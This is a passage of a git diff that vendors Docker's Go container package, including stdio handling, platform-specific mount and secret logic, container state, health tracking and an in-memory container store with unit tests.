gets the stderr stream of the container +func (container *Container) StderrPipe() io.ReadCloser { + return container.StreamConfig.StderrPipe() +} + +// CloseStreams closes the container's stdio streams +func (container *Container) CloseStreams() error { + return container.StreamConfig.CloseStreams() +} + +// InitializeStdio is called by libcontainerd to connect the stdio. +func (container *Container) InitializeStdio(iop libcontainerd.IOPipe) error { + if err := container.startLogging(); err != nil { + container.Reset(false) + return err + } + + container.StreamConfig.CopyToPipe(iop) + + if container.StreamConfig.Stdin() == nil && !container.Config.Tty { + if iop.Stdin != nil { + if err := iop.Stdin.Close(); err != nil { + logrus.Warnf("error closing stdin: %+v", err) + } + } + } + + return nil +} diff --git a/vendor/github.com/docker/docker/container/container_linux.go b/vendor/github.com/docker/docker/container/container_linux.go new file mode 100644 index 0000000000..4d4c16b563 --- /dev/null +++ b/vendor/github.com/docker/docker/container/container_linux.go @@ -0,0 +1,9 @@ +package container + +import ( + "golang.org/x/sys/unix" +) + +func detachMounted(path string) error { + return unix.Unmount(path, unix.MNT_DETACH) +} diff --git a/vendor/github.com/docker/docker/container/container_notlinux.go b/vendor/github.com/docker/docker/container/container_notlinux.go new file mode 100644 index 0000000000..f65653e992 --- /dev/null +++ b/vendor/github.com/docker/docker/container/container_notlinux.go @@ -0,0 +1,23 @@ +// +build solaris freebsd + +package container + +import ( + "golang.org/x/sys/unix" +) + +func detachMounted(path string) error { + //Solaris and FreeBSD do not support the lazy unmount or MNT_DETACH feature. + // Therefore there are separate definitions for this. + return unix.Unmount(path, 0) +} + +// SecretMount returns the mount for the secret path +func (container *Container) SecretMount() *Mount { + return nil +} + +// UnmountSecrets unmounts the fs for secrets +func (container *Container) UnmountSecrets() error { + return nil +} diff --git a/vendor/github.com/docker/docker/container/container_unit_test.go b/vendor/github.com/docker/docker/container/container_unit_test.go new file mode 100644 index 0000000000..f301f25bbe --- /dev/null +++ b/vendor/github.com/docker/docker/container/container_unit_test.go @@ -0,0 +1,60 @@ +package container + +import ( + "testing" + + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/pkg/signal" +) + +func TestContainerStopSignal(t *testing.T) { + c := &Container{ + CommonContainer: CommonContainer{ + Config: &container.Config{}, + }, + } + + def, err := signal.ParseSignal(signal.DefaultStopSignal) + if err != nil { + t.Fatal(err) + } + + s := c.StopSignal() + if s != int(def) { + t.Fatalf("Expected %v, got %v", def, s) + } + + c = &Container{ + CommonContainer: CommonContainer{ + Config: &container.Config{StopSignal: "SIGKILL"}, + }, + } + s = c.StopSignal() + if s != 9 { + t.Fatalf("Expected 9, got %v", s) + } +} + +func TestContainerStopTimeout(t *testing.T) { + c := &Container{ + CommonContainer: CommonContainer{ + Config: &container.Config{}, + }, + } + + s := c.StopTimeout() + if s != DefaultStopTimeout { + t.Fatalf("Expected %v, got %v", DefaultStopTimeout, s) + } + + stopTimeout := 15 + c = &Container{ + CommonContainer: CommonContainer{ + Config: &container.Config{StopTimeout: &stopTimeout}, + }, + } + s = c.StopSignal() + if s != 15 { + t.Fatalf("Expected 15, got %v", s) + } +} diff --git a/vendor/github.com/docker/docker/container/container_unix.go b/vendor/github.com/docker/docker/container/container_unix.go new file mode 100644 index 0000000000..4f6b795d2c --- /dev/null +++ b/vendor/github.com/docker/docker/container/container_unix.go @@ -0,0 +1,448 @@ +// +build linux freebsd solaris + +package container + +import ( + "fmt" + "io/ioutil" + "os" + "path/filepath" + "strings" + + "github.com/Sirupsen/logrus" + containertypes "github.com/docker/docker/api/types/container" + mounttypes "github.com/docker/docker/api/types/mount" + "github.com/docker/docker/pkg/chrootarchive" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/pkg/symlink" + "github.com/docker/docker/pkg/system" + "github.com/docker/docker/utils" + "github.com/docker/docker/volume" + "github.com/opencontainers/runc/libcontainer/label" + "golang.org/x/sys/unix" +) + +const ( + // DefaultSHMSize is the default size (64MB) of the SHM which will be mounted in the container + DefaultSHMSize int64 = 67108864 + containerSecretMountPath = "/run/secrets" +) + +// Container holds the fields specific to unixen implementations. +// See CommonContainer for standard fields common to all containers. +type Container struct { + CommonContainer + + // Fields below here are platform specific. + AppArmorProfile string + HostnamePath string + HostsPath string + ShmPath string + ResolvConfPath string + SeccompProfile string + NoNewPrivileges bool +} + +// ExitStatus provides exit reasons for a container. +type ExitStatus struct { + // The exit code with which the container exited. + ExitCode int + + // Whether the container encountered an OOM. + OOMKilled bool +} + +// CreateDaemonEnvironment returns the list of all environment variables given the list of +// environment variables related to links. +// Sets PATH, HOSTNAME and if container.Config.Tty is set: TERM. +// The defaults set here do not override the values in container.Config.Env +func (container *Container) CreateDaemonEnvironment(tty bool, linkedEnv []string) []string { + // Setup environment + env := []string{ + "PATH=" + system.DefaultPathEnv, + "HOSTNAME=" + container.Config.Hostname, + } + if tty { + env = append(env, "TERM=xterm") + } + env = append(env, linkedEnv...) + // because the env on the container can override certain default values + // we need to replace the 'env' keys where they match and append anything + // else. + env = utils.ReplaceOrAppendEnvValues(env, container.Config.Env) + return env +} + +// TrySetNetworkMount attempts to set the network mounts given a provided destination and +// the path to use for it; return true if the given destination was a network mount file +func (container *Container) TrySetNetworkMount(destination string, path string) bool { + if destination == "/etc/resolv.conf" { + container.ResolvConfPath = path + return true + } + if destination == "/etc/hostname" { + container.HostnamePath = path + return true + } + if destination == "/etc/hosts" { + container.HostsPath = path + return true + } + + return false +} + +// BuildHostnameFile writes the container's hostname file. +func (container *Container) BuildHostnameFile() error { + hostnamePath, err := container.GetRootResourcePath("hostname") + if err != nil { + return err + } + container.HostnamePath = hostnamePath + return ioutil.WriteFile(container.HostnamePath, []byte(container.Config.Hostname+"\n"), 0644) +} + +// NetworkMounts returns the list of network mounts. +func (container *Container) NetworkMounts() []Mount { + var mounts []Mount + shared := container.HostConfig.NetworkMode.IsContainer() + if container.ResolvConfPath != "" { + if _, err := os.Stat(container.ResolvConfPath); err != nil { + logrus.Warnf("ResolvConfPath set to %q, but can't stat this filename (err = %v); skipping", container.ResolvConfPath, err) + } else { + if !container.HasMountFor("/etc/resolv.conf") { + label.Relabel(container.ResolvConfPath, container.MountLabel, shared) + } + writable := !container.HostConfig.ReadonlyRootfs + if m, exists := container.MountPoints["/etc/resolv.conf"]; exists { + writable = m.RW + } + mounts = append(mounts, Mount{ + Source: container.ResolvConfPath, + Destination: "/etc/resolv.conf", + Writable: writable, + Propagation: string(volume.DefaultPropagationMode), + }) + } + } + if container.HostnamePath != "" { + if _, err := os.Stat(container.HostnamePath); err != nil { + logrus.Warnf("HostnamePath set to %q, but can't stat this filename (err = %v); skipping", container.HostnamePath, err) + } else { + if !container.HasMountFor("/etc/hostname") { + label.Relabel(container.HostnamePath, container.MountLabel, shared) + } + writable := !container.HostConfig.ReadonlyRootfs + if m, exists := container.MountPoints["/etc/hostname"]; exists { + writable = m.RW + } + mounts = append(mounts, Mount{ + Source: container.HostnamePath, + Destination: "/etc/hostname", + Writable: writable, + Propagation: string(volume.DefaultPropagationMode), + }) + } + } + if container.HostsPath != "" { + if _, err := os.Stat(container.HostsPath); err != nil { + logrus.Warnf("HostsPath set to %q, but can't stat this filename (err = %v); skipping", container.HostsPath, err) + } else { + if !container.HasMountFor("/etc/hosts") { + label.Relabel(container.HostsPath, container.MountLabel, shared) + } + writable := !container.HostConfig.ReadonlyRootfs + if m, exists := container.MountPoints["/etc/hosts"]; exists { + writable = m.RW + } + mounts = append(mounts, Mount{ + Source: container.HostsPath, + Destination: "/etc/hosts", + Writable: writable, + Propagation: string(volume.DefaultPropagationMode), + }) + } + } + return mounts +} + +// SecretMountPath returns the path of the secret mount for the container +func (container *Container) SecretMountPath() string { + return filepath.Join(container.Root, "secrets") +} + +// CopyImagePathContent copies files in destination to the volume. +func (container *Container) CopyImagePathContent(v volume.Volume, destination string) error { + rootfs, err := symlink.FollowSymlinkInScope(filepath.Join(container.BaseFS, destination), container.BaseFS) + if err != nil { + return err + } + + if _, err = ioutil.ReadDir(rootfs); err != nil { + if os.IsNotExist(err) { + return nil + } + return err + } + + id := stringid.GenerateNonCryptoID() + path, err := v.Mount(id) + if err != nil { + return err + } + + defer func() { + if err := v.Unmount(id); err != nil { + logrus.Warnf("error while unmounting volume %s: %v", v.Name(), err) + } + }() + if err := label.Relabel(path, container.MountLabel, true); err != nil && err != unix.ENOTSUP { + return err + } + return copyExistingContents(rootfs, path) +} + +// ShmResourcePath returns path to shm +func (container *Container) ShmResourcePath() (string, error) { + return container.GetRootResourcePath("shm") +} + +// HasMountFor checks if path is a mountpoint +func (container *Container) HasMountFor(path string) bool { + _, exists := container.MountPoints[path] + return exists +} + +// UnmountIpcMounts uses the provided unmount function to unmount shm and mqueue if they were mounted +func (container *Container) UnmountIpcMounts(unmount func(pth string) error) { + if container.HostConfig.IpcMode.IsContainer() || container.HostConfig.IpcMode.IsHost() { + return + } + + var warnings []string + + if !container.HasMountFor("/dev/shm") { + shmPath, err := container.ShmResourcePath() + if err != nil { + logrus.Error(err) + warnings = append(warnings, err.Error()) + } else if shmPath != "" { + if err := unmount(shmPath); err != nil && !os.IsNotExist(err) { + warnings = append(warnings, fmt.Sprintf("failed to umount %s: %v", shmPath, err)) + } + + } + } + + if len(warnings) > 0 { + logrus.Warnf("failed to cleanup ipc mounts:\n%v", strings.Join(warnings, "\n")) + } +} + +// IpcMounts returns the list of IPC mounts +func (container *Container) IpcMounts() []Mount { + var mounts []Mount + + if !container.HasMountFor("/dev/shm") { + label.SetFileLabel(container.ShmPath, container.MountLabel) + mounts = append(mounts, Mount{ + Source: container.ShmPath, + Destination: "/dev/shm", + Writable: true, + Propagation: string(volume.DefaultPropagationMode), + }) + } + + return mounts +} + +// SecretMount returns the mount for the secret path +func (container *Container) SecretMount() *Mount { + if len(container.SecretReferences) > 0 { + return &Mount{ + Source: container.SecretMountPath(), + Destination: containerSecretMountPath, + Writable: false, + } + } + + return nil +} + +// UnmountSecrets unmounts the local tmpfs for secrets +func (container *Container) UnmountSecrets() error { + if _, err := os.Stat(container.SecretMountPath()); err != nil { + if os.IsNotExist(err) { + return nil + } + return err + } + + return detachMounted(container.SecretMountPath()) +} + +// UpdateContainer updates configuration of a container. +func (container *Container) UpdateContainer(hostConfig *containertypes.HostConfig) error { + container.Lock() + defer container.Unlock() + + // update resources of container + resources := hostConfig.Resources + cResources := &container.HostConfig.Resources + if resources.BlkioWeight != 0 { + cResources.BlkioWeight = resources.BlkioWeight + } + if resources.CPUShares != 0 { + cResources.CPUShares = resources.CPUShares + } + if resources.CPUPeriod != 0 { + cResources.CPUPeriod = resources.CPUPeriod + } + if resources.CPUQuota != 0 { + cResources.CPUQuota = resources.CPUQuota + } + if resources.CpusetCpus != "" { + cResources.CpusetCpus = resources.CpusetCpus + } + if resources.CpusetMems != "" { + cResources.CpusetMems = resources.CpusetMems + } + if resources.Memory != 0 { + // if memory limit smaller than already set memoryswap limit and doesn't + // update the memoryswap limit, then error out. + if resources.Memory > cResources.MemorySwap && resources.MemorySwap == 0 { + return fmt.Errorf("Memory limit should be smaller than already set memoryswap limit, update the memoryswap at the same time") + } + cResources.Memory = resources.Memory + } + if resources.MemorySwap != 0 { + cResources.MemorySwap = resources.MemorySwap + } + if resources.MemoryReservation != 0 { + cResources.MemoryReservation = resources.MemoryReservation + } + if resources.KernelMemory != 0 { + cResources.KernelMemory = resources.KernelMemory + } + + // update HostConfig of container + if hostConfig.RestartPolicy.Name != "" { + if container.HostConfig.AutoRemove && !hostConfig.RestartPolicy.IsNone() { + return fmt.Errorf("Restart policy cannot be updated because AutoRemove is enabled for the container") + } + container.HostConfig.RestartPolicy = hostConfig.RestartPolicy + } + + if err := container.ToDisk(); err != nil { + logrus.Errorf("Error saving updated container: %v", err) + return err + } + + return nil +} + +// DetachAndUnmount uses a detached mount on all mount destinations, then +// unmounts each volume normally. +// This is used from daemon/archive for `docker cp` +func (container *Container) DetachAndUnmount(volumeEventLog func(name, action string, attributes map[string]string)) error { + networkMounts := container.NetworkMounts() + mountPaths := make([]string, 0, len(container.MountPoints)+len(networkMounts)) + + for _, mntPoint := range container.MountPoints { + dest, err := container.GetResourcePath(mntPoint.Destination) + if err != nil { + logrus.Warnf("Failed to get volume destination path for container '%s' at '%s' while lazily unmounting: %v", container.ID, mntPoint.Destination, err) + continue + } + mountPaths = append(mountPaths, dest) + } + + for _, m := range networkMounts { + dest, err := container.GetResourcePath(m.Destination) + if err != nil { + logrus.Warnf("Failed to get volume destination path for container '%s' at '%s' while lazily unmounting: %v", container.ID, m.Destination, err) + continue + } + mountPaths = append(mountPaths, dest) + } + + for _, mountPath := range mountPaths { + if err := detachMounted(mountPath); err != nil { + logrus.Warnf("%s unmountVolumes: Failed to do lazy umount fo volume '%s': %v", container.ID, mountPath, err) + } + } + return container.UnmountVolumes(volumeEventLog) +} + +// copyExistingContents copies from the source to the destination and +// ensures the ownership is appropriately set. +func copyExistingContents(source, destination string) error { + volList, err := ioutil.ReadDir(source) + if err != nil { + return err + } + if len(volList) > 0 { + srcList, err := ioutil.ReadDir(destination) + if err != nil { + return err + } + if len(srcList) == 0 { + // If the source volume is empty, copies files from the root into the volume + if err := chrootarchive.CopyWithTar(source, destination); err != nil { + return err + } + } + } + return copyOwnership(source, destination) +} + +// copyOwnership copies the permissions and uid:gid of the source file +// to the destination file +func copyOwnership(source, destination string) error { + stat, err := system.Stat(source) + if err != nil { + return err + } + + if err := os.Chown(destination, int(stat.UID()), int(stat.GID())); err != nil { + return err + } + + return os.Chmod(destination, os.FileMode(stat.Mode())) +} + +// TmpfsMounts returns the list of tmpfs mounts +func (container *Container) TmpfsMounts() ([]Mount, error) { + var mounts []Mount + for dest, data := range container.HostConfig.Tmpfs { + mounts = append(mounts, Mount{ + Source: "tmpfs", + Destination: dest, + Data: data, + }) + } + for dest, mnt := range container.MountPoints { + if mnt.Type == mounttypes.TypeTmpfs { + data, err := volume.ConvertTmpfsOptions(mnt.Spec.TmpfsOptions, mnt.Spec.ReadOnly) + if err != nil { + return nil, err + } + mounts = append(mounts, Mount{ + Source: "tmpfs", + Destination: dest, + Data: data, + }) + } + } + return mounts, nil +} + +// cleanResourcePath cleans a resource path and prepares to combine with mnt path +func cleanResourcePath(path string) string { + return filepath.Join(string(os.PathSeparator), path) +} + +// EnableServiceDiscoveryOnDefaultNetwork Enable service discovery on default network +func (container *Container) EnableServiceDiscoveryOnDefaultNetwork() bool { + return false +} diff --git a/vendor/github.com/docker/docker/container/container_windows.go b/vendor/github.com/docker/docker/container/container_windows.go new file mode 100644 index 0000000000..1025836f1f --- /dev/null +++ b/vendor/github.com/docker/docker/container/container_windows.go @@ -0,0 +1,111 @@ +// +build windows + +package container + +import ( + "fmt" + "os" + "path/filepath" + + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/utils" +) + +// Container holds fields specific to the Windows implementation. See +// CommonContainer for standard fields common to all containers. +type Container struct { + CommonContainer + + // Fields below here are platform specific. +} + +// ExitStatus provides exit reasons for a container. +type ExitStatus struct { + // The exit code with which the container exited. + ExitCode int +} + +// CreateDaemonEnvironment creates a new environment variable slice for this container. +func (container *Container) CreateDaemonEnvironment(_ bool, linkedEnv []string) []string { + // because the env on the container can override certain default values + // we need to replace the 'env' keys where they match and append anything + // else. + return utils.ReplaceOrAppendEnvValues(linkedEnv, container.Config.Env) +} + +// UnmountIpcMounts unmounts Ipc related mounts. +// This is a NOOP on windows. +func (container *Container) UnmountIpcMounts(unmount func(pth string) error) { +} + +// IpcMounts returns the list of Ipc related mounts. +func (container *Container) IpcMounts() []Mount { + return nil +} + +// SecretMount returns the mount for the secret path +func (container *Container) SecretMount() *Mount { + return nil +} + +// UnmountSecrets unmounts the fs for secrets +func (container *Container) UnmountSecrets() error { + return nil +} + +// DetachAndUnmount unmounts all volumes. +// On Windows it only delegates to `UnmountVolumes` since there is nothing to +// force unmount. +func (container *Container) DetachAndUnmount(volumeEventLog func(name, action string, attributes map[string]string)) error { + return container.UnmountVolumes(volumeEventLog) +} + +// TmpfsMounts returns the list of tmpfs mounts +func (container *Container) TmpfsMounts() ([]Mount, error) { + var mounts []Mount + return mounts, nil +} + +// UpdateContainer updates configuration of a container +func (container *Container) UpdateContainer(hostConfig *containertypes.HostConfig) error { + container.Lock() + defer container.Unlock() + resources := hostConfig.Resources + if resources.BlkioWeight != 0 || resources.CPUShares != 0 || + resources.CPUPeriod != 0 || resources.CPUQuota != 0 || + resources.CpusetCpus != "" || resources.CpusetMems != "" || + resources.Memory != 0 || resources.MemorySwap != 0 || + resources.MemoryReservation != 0 || resources.KernelMemory != 0 { + return fmt.Errorf("Resource updating isn't supported on Windows") + } + // update HostConfig of container + if hostConfig.RestartPolicy.Name != "" { + if container.HostConfig.AutoRemove && !hostConfig.RestartPolicy.IsNone() { + return fmt.Errorf("Restart policy cannot be updated because AutoRemove is enabled for the container") + } + container.HostConfig.RestartPolicy = hostConfig.RestartPolicy + } + return nil +} + +// cleanResourcePath cleans a resource path by removing C:\ syntax, and prepares +// to combine with a volume path +func cleanResourcePath(path string) string { + if len(path) >= 2 { + c := path[0] + if path[1] == ':' && ('a' <= c && c <= 'z' || 'A' <= c && c <= 'Z') { + path = path[2:] + } + } + return filepath.Join(string(os.PathSeparator), path) +} + +// BuildHostnameFile writes the container's hostname file. +func (container *Container) BuildHostnameFile() error { + return nil +} + +// EnableServiceDiscoveryOnDefaultNetwork Enable service discovery on default network +func (container *Container) EnableServiceDiscoveryOnDefaultNetwork() bool { + return true +} diff --git a/vendor/github.com/docker/docker/container/health.go b/vendor/github.com/docker/docker/container/health.go new file mode 100644 index 0000000000..6e3cd12f3b --- /dev/null +++ b/vendor/github.com/docker/docker/container/health.go @@ -0,0 +1,49 @@ +package container + +import ( + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/types" +) + +// Health holds the current container health-check state +type Health struct { + types.Health + stop chan struct{} // Write struct{} to stop the monitor +} + +// String returns a human-readable description of the health-check state +func (s *Health) String() string { + // This happens when the container is being shutdown and the monitor has stopped + // or the monitor has yet to be setup. + if s.stop == nil { + return types.Unhealthy + } + + switch s.Status { + case types.Starting: + return "health: starting" + default: // Healthy and Unhealthy are clear on their own + return s.Status + } +} + +// OpenMonitorChannel creates and returns a new monitor channel. If there already is one, +// it returns nil. +func (s *Health) OpenMonitorChannel() chan struct{} { + if s.stop == nil { + logrus.Debug("OpenMonitorChannel") + s.stop = make(chan struct{}) + return s.stop + } + return nil +} + +// CloseMonitorChannel closes any existing monitor channel. +func (s *Health) CloseMonitorChannel() { + if s.stop != nil { + logrus.Debug("CloseMonitorChannel: waiting for probe to stop") + close(s.stop) + s.stop = nil + logrus.Debug("CloseMonitorChannel done") + } +} diff --git a/vendor/github.com/docker/docker/container/history.go b/vendor/github.com/docker/docker/container/history.go new file mode 100644 index 0000000000..c80c2aa0cc --- /dev/null +++ b/vendor/github.com/docker/docker/container/history.go @@ -0,0 +1,30 @@ +package container + +import "sort" + +// History is a convenience type for storing a list of containers, +// sorted by creation date in descendant order. +type History []*Container + +// Len returns the number of containers in the history. +func (history *History) Len() int { + return len(*history) +} + +// Less compares two containers and returns true if the second one +// was created before the first one. +func (history *History) Less(i, j int) bool { + containers := *history + return containers[j].Created.Before(containers[i].Created) +} + +// Swap switches containers i and j positions in the history. +func (history *History) Swap(i, j int) { + containers := *history + containers[i], containers[j] = containers[j], containers[i] +} + +// sort orders the history by creation date in descendant order. +func (history *History) sort() { + sort.Sort(history) +} diff --git a/vendor/github.com/docker/docker/container/memory_store.go b/vendor/github.com/docker/docker/container/memory_store.go new file mode 100644 index 0000000000..706407a71c --- /dev/null +++ b/vendor/github.com/docker/docker/container/memory_store.go @@ -0,0 +1,95 @@ +package container + +import ( + "sync" +) + +// memoryStore implements a Store in memory. +type memoryStore struct { + s map[string]*Container + sync.RWMutex +} + +// NewMemoryStore initializes a new memory store. +func NewMemoryStore() Store { + return &memoryStore{ + s: make(map[string]*Container), + } +} + +// Add appends a new container to the memory store. +// It overrides the id if it existed before. +func (c *memoryStore) Add(id string, cont *Container) { + c.Lock() + c.s[id] = cont + c.Unlock() +} + +// Get returns a container from the store by id. +func (c *memoryStore) Get(id string) *Container { + var res *Container + c.RLock() + res = c.s[id] + c.RUnlock() + return res +} + +// Delete removes a container from the store by id. +func (c *memoryStore) Delete(id string) { + c.Lock() + delete(c.s, id) + c.Unlock() +} + +// List returns a sorted list of containers from the store. +// The containers are ordered by creation date. +func (c *memoryStore) List() []*Container { + containers := History(c.all()) + containers.sort() + return containers +} + +// Size returns the number of containers in the store. +func (c *memoryStore) Size() int { + c.RLock() + defer c.RUnlock() + return len(c.s) +} + +// First returns the first container found in the store by a given filter. +func (c *memoryStore) First(filter StoreFilter) *Container { + for _, cont := range c.all() { + if filter(cont) { + return cont + } + } + return nil +} + +// ApplyAll calls the reducer function with every container in the store. +// This operation is asynchronous in the memory store. +// NOTE: Modifications to the store MUST NOT be done by the StoreReducer. +func (c *memoryStore) ApplyAll(apply StoreReducer) { + wg := new(sync.WaitGroup) + for _, cont := range c.all() { + wg.Add(1) + go func(container *Container) { + apply(container) + wg.Done() + }(cont) + } + + wg.Wait() +} + +func (c *memoryStore) all() []*Container { + c.RLock() + containers := make([]*Container, 0, len(c.s)) + for _, cont := range c.s { + containers = append(containers, cont) + } + c.RUnlock() + return containers +} + +var _ Store = &memoryStore{} diff --git a/vendor/github.com/docker/docker/container/memory_store_test.go b/vendor/github.com/docker/docker/container/memory_store_test.go new file mode 100644 index 0000000000..f81738fae1 --- /dev/null +++ b/vendor/github.com/docker/docker/container/memory_store_test.go @@ -0,0 +1,106 @@ +package container + +import ( + "testing" + "time" +) + +func TestNewMemoryStore(t *testing.T) { + s := NewMemoryStore() + m, ok := s.(*memoryStore) + if !ok { + t.Fatalf("store is not a memory store %v", s) + } + if m.s == nil { + t.Fatal("expected store map to not be nil") + } +} + +func TestAddContainers(t *testing.T) { + s := NewMemoryStore() + s.Add("id", NewBaseContainer("id", "root")) + if s.Size() != 1 { + t.Fatalf("expected store size 1, got %v", s.Size()) + } +} + +func TestGetContainer(t *testing.T) { + s := NewMemoryStore() + s.Add("id", NewBaseContainer("id", "root")) + c := s.Get("id") + if c == nil { + t.Fatal("expected container to not be nil") + } +} + +func TestDeleteContainer(t *testing.T) { + s := NewMemoryStore() + s.Add("id", NewBaseContainer("id", "root")) + s.Delete("id") + if c := s.Get("id"); c != nil { + t.Fatalf("expected container to be nil after removal, got %v", c) + } + + if s.Size() != 0 { + t.Fatalf("expected store size to be 0, got %v", s.Size()) + } +} + +func TestListContainers(t *testing.T) { + s := NewMemoryStore() + + cont := NewBaseContainer("id", "root") + cont.Created = time.Now() + cont2 := NewBaseContainer("id2", "root") + cont2.Created = time.Now().Add(24 * time.Hour) + + s.Add("id", cont) + s.Add("id2", cont2) + + list := s.List() + if len(list) != 2 { + t.Fatalf("expected list size 2, got %v", len(list)) + } + if list[0].ID != "id2" { + t.Fatalf("expected older container to be first, got %v", list[0].ID) + } +} + +func TestFirstContainer(t *testing.T) { + s := NewMemoryStore() + + s.Add("id", NewBaseContainer("id", "root")) + s.Add("id2", NewBaseContainer("id2", "root")) + + first := s.First(func(cont *Container) bool { + return cont.ID == "id2" + }) + + if first == nil { + t.Fatal("expected container to not be nil") + } + if first.ID != "id2" { + t.Fatalf("expected id2, got %v", first) + } +} + +func TestApplyAllContainer(t *testing.T) { + s := NewMemoryStore() + + s.Add("id", NewBaseContainer("id", "root")) + s.Add("id2", NewBaseContainer("id2", "root")) + + s.ApplyAll(func(cont *Container) { + if cont.ID == "id2" { + cont.ID = "newID" + } + }) + + cont := s.Get("id2") + if cont == nil { + t.Fatal("expected container to not be nil") + } + if cont.ID != "newID" { + t.Fatalf("expected newID, got %v", cont) + } +} diff --git a/vendor/github.com/docker/docker/container/monitor.go b/vendor/github.com/docker/docker/container/monitor.go new file mode 100644 index 0000000000..f05e72b25f --- /dev/null +++ b/vendor/github.com/docker/docker/container/monitor.go @@ -0,0 +1,46 @@ +package container + +import ( + "time" + + "github.com/Sirupsen/logrus" +) + +const ( + loggerCloseTimeout = 10 * time.Second +) + +// Reset puts a container into a state where it can be restarted again. +func (container *Container) Reset(lock bool) { + if lock { + container.Lock() + defer container.Unlock() + } + + if err := container.CloseStreams(); err != nil { + logrus.Errorf("%s: %s", container.ID, err) + } + + // Re-create a brand new stdin pipe once the container exited + if container.Config.OpenStdin { + container.StreamConfig.NewInputPipes() + } + + if container.LogDriver != nil { + if container.LogCopier != nil { + exit := make(chan struct{}) + go func() { + container.LogCopier.Wait() + close(exit) + }() + select { + case <-time.After(loggerCloseTimeout): + logrus.Warn("Logger didn't exit in time: logs may be truncated") + case <-exit: + } + } + container.LogDriver.Close() + container.LogCopier = nil + container.LogDriver = nil + } +} diff --git a/vendor/github.com/docker/docker/container/mounts_unix.go b/vendor/github.com/docker/docker/container/mounts_unix.go new file mode 100644 index 0000000000..c52abed2dc --- /dev/null +++ b/vendor/github.com/docker/docker/container/mounts_unix.go @@ -0,0 +1,12 @@ +// +build !windows + +package container + +// Mount contains information for a mount operation. +type Mount struct { + Source string `json:"source"` + Destination string `json:"destination"` + Writable bool `json:"writable"` + Data string `json:"data"` + Propagation string `json:"mountpropagation"` +} diff --git a/vendor/github.com/docker/docker/container/mounts_windows.go b/vendor/github.com/docker/docker/container/mounts_windows.go new file mode 100644 index 0000000000..01b327f788 --- /dev/null +++ b/vendor/github.com/docker/docker/container/mounts_windows.go @@ -0,0 +1,8 @@ +package container + +// Mount contains information for a mount operation. +type Mount struct { + Source string `json:"source"` + Destination string `json:"destination"` + Writable bool `json:"writable"` +} diff --git a/vendor/github.com/docker/docker/container/state.go b/vendor/github.com/docker/docker/container/state.go new file mode 100644 index 0000000000..4dd2ecec69 --- /dev/null +++ b/vendor/github.com/docker/docker/container/state.go @@ -0,0 +1,343 @@ +package container + +import ( + "fmt" + "sync" + "time" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/go-units" +) + +// State holds the current container state, and has methods to get and +// set the state. Container has an embed, which allows all of the +// functions defined against State to run against Container. +type State struct { + sync.Mutex + // FIXME: Why do we have both paused and running if a + // container cannot be paused and running at the same time? + Running bool + Paused bool + Restarting bool + OOMKilled bool + RemovalInProgress bool // Not need for this to be persistent on disk. + Dead bool + Pid int + ExitCodeValue int `json:"ExitCode"` + ErrorMsg string `json:"Error"` // contains last known error when starting the container + StartedAt time.Time + FinishedAt time.Time + waitChan chan struct{} + Health *Health +} + +// StateStatus is used to return an error type implementing both +// exec.ExitCode and error. +// This type is needed as State include a sync.Mutex field which make +// copying it unsafe. +type StateStatus struct { + exitCode int + error string +} + +func newStateStatus(ec int, err string) *StateStatus { + return &StateStatus{ + exitCode: ec, + error: err, + } +} + +// ExitCode returns current exitcode for the state. +func (ss *StateStatus) ExitCode() int { + return ss.exitCode +} + +// Error returns current error for the state. +func (ss *StateStatus) Error() string { + return ss.error +} + +// NewState creates a default state object with a fresh channel for state changes. +func NewState() *State { + return &State{ + waitChan: make(chan struct{}), + } +} + +// String returns a human-readable description of the state +func (s *State) String() string { + if s.Running { + if s.Paused { + return fmt.Sprintf("Up %s (Paused)", units.HumanDuration(time.Now().UTC().Sub(s.StartedAt))) + } + if s.Restarting { + return fmt.Sprintf("Restarting (%d) %s ago", s.ExitCodeValue, units.HumanDuration(time.Now().UTC().Sub(s.FinishedAt))) + } + + if h := s.Health; h != nil { + return fmt.Sprintf("Up %s (%s)", units.HumanDuration(time.Now().UTC().Sub(s.StartedAt)), h.String()) + } + + return fmt.Sprintf("Up %s", units.HumanDuration(time.Now().UTC().Sub(s.StartedAt))) + } + + if s.RemovalInProgress { + return "Removal In Progress" + } + + if s.Dead { + return "Dead" + } + + if s.StartedAt.IsZero() { + return "Created" + } + + if s.FinishedAt.IsZero() { + return "" + } + + return fmt.Sprintf("Exited (%d) %s ago", s.ExitCodeValue, units.HumanDuration(time.Now().UTC().Sub(s.FinishedAt))) +} + +// HealthString returns a single string to describe health status. +func (s *State) HealthString() string { + if s.Health == nil { + return types.NoHealthcheck + } + + return s.Health.String() +} + +// IsValidHealthString checks if the provided string is a valid container health status or not. +func IsValidHealthString(s string) bool { + return s == types.Starting || + s == types.Healthy || + s == types.Unhealthy || + s == types.NoHealthcheck +} + +// StateString returns a single string to describe state +func (s *State) StateString() string { + if s.Running { + if s.Paused { + return "paused" + } + if s.Restarting { + return "restarting" + } + return "running" + } + + if s.RemovalInProgress { + return "removing" + } + + if s.Dead { + return "dead" + } + + if s.StartedAt.IsZero() { + return "created" + } + + return "exited" +} + +// IsValidStateString checks if the provided string is a valid container state or not. +func IsValidStateString(s string) bool { + if s != "paused" && + s != "restarting" && + s != "removing" && + s != "running" && + s != "dead" && + s != "created" && + s != "exited" { + return false + } + return true +} + +func wait(waitChan <-chan struct{}, timeout time.Duration) error { + if timeout < 0 { + <-waitChan + return nil + } + select { + case <-time.After(timeout): + return fmt.Errorf("Timed out: %v", timeout) + case <-waitChan: + return nil + } +} + +// WaitStop waits until state is stopped. If state already stopped it returns +// immediately. If you want wait forever you must supply negative timeout. +// Returns exit code, that was passed to SetStopped +func (s *State) WaitStop(timeout time.Duration) (int, error) { + s.Lock() + if !s.Running { + exitCode := s.ExitCodeValue + s.Unlock() + return exitCode, nil + } + waitChan := s.waitChan + s.Unlock() + if err := wait(waitChan, timeout); err != nil { + return -1, err + } + s.Lock() + defer s.Unlock() + return s.ExitCode(), nil +} + +// WaitWithContext waits for the container to stop. Optional context can be +// passed for canceling the request. +func (s *State) WaitWithContext(ctx context.Context) error { + // todo(tonistiigi): make other wait functions use this + s.Lock() + if !s.Running { + state := newStateStatus(s.ExitCode(), s.Error()) + defer s.Unlock() + if state.ExitCode() == 0 { + return nil + } + return state + } + waitChan := 